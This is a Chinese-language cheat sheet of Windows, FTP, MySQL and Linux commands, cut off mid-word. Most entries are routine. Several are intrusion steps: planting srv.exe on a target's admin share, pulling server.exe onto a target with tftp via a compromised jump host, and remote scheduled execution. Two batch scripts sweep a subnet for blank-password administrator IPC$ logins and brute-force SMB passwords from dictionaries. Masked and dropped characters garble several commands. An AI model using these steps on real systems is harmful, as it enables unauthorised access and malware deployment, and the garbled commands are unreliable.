del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中," "和" " 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at [url=file://ip/]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe [url=file://ip/***$]\\ip\***$[/url] 复制本地c:\srv.exe到对方的***下
c y 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy [url=file://ip/***$/svv.exe]\\ip\***$\svv.exe[/url] c:\ 或:copy\\ip\***$\*.* 复制对方***i$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 pa .txt 将"信息"保存到pa .txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名erm 替换指定用户的访问权限;/G 用户名erm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况
IIS服务命令:
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
iisreset /start或stop 启动(停止)所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
FTP 命令: (后面有详细说明内容)
ftp的命令行格式为:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
-d 使用调试方式。
-n 限制ftp的自动登录,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [pa word] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote-dir 进入远程主机目录
cdup 进入远程主机目录的父目录
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
MYSQL 命令:
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚***好MYSQL,超级用户root是没有密码的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格,其它也一样)
exit 退出MYSQL
mysql*** -u用户名 -p旧密码 pa word 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
show database 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
use mysql;
show table 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名;
create table 表名 (字段设定列表); 建表
drop database 库名;
drop table 表名; 删库和删表
delete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
mysqldump --opt school> chool. 备份数据库:(命令在DOS的[url=file://mysql//bin]\\mysql\\bin[/url]目录下执行);注释:将数据库school备份到school. 文件,school. 是一个文本文件,文件名任取,打开看看你会有新发现。
win2003系统下新增命令(实用部份):
shutdown /参数 关闭或重启本地或远程主机。
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
例:shutdown /r /t 0 立即重启本地主机(无延时)
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
Linux系统下基本命令: 要区分大小写
uname 显示版本信息(同win2K的 ver)
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
pwd 查询当前所在的目录位置
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。
cat 文件名 查看文件内容
cat abc.txt 往abc.txt文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件,rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录,目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
grou 查看某人的Group
pa wd 更改密码
history 查看自己下过的命令 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
ftp ftp连接上某服务器(同win2K)
附:批处理命令与变量
1:for命令及变量 基本格式:
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use [url=file://ip/ipc$]\\ip\ipc$[/url] pa /user:user 中ip为%1,pa 为%2 ,user为%3
(set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }
command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:&am 来隔开
command_parameters:为特定命令指定参数或命令行开关
IN (set):指在(set)中取值;DO command :指执行command
参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:\pa .txt)时 }。
用法举例:
@echo off
echo 用法格式:test.bat *.*.* test.txt
for /L %%G in (1 1 254) do echo %1.%%G test.txt &am net use [url=file://%251.%25%25G/]\\%1.%%G[/url] /user:***istrator | find "命令成功完成" test.txt
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立***istrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。
/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);&am 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pa .dic 200
存为:ok.exe 说明:输入一个IP后,用字典文件d:\pa .dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。
2:if命
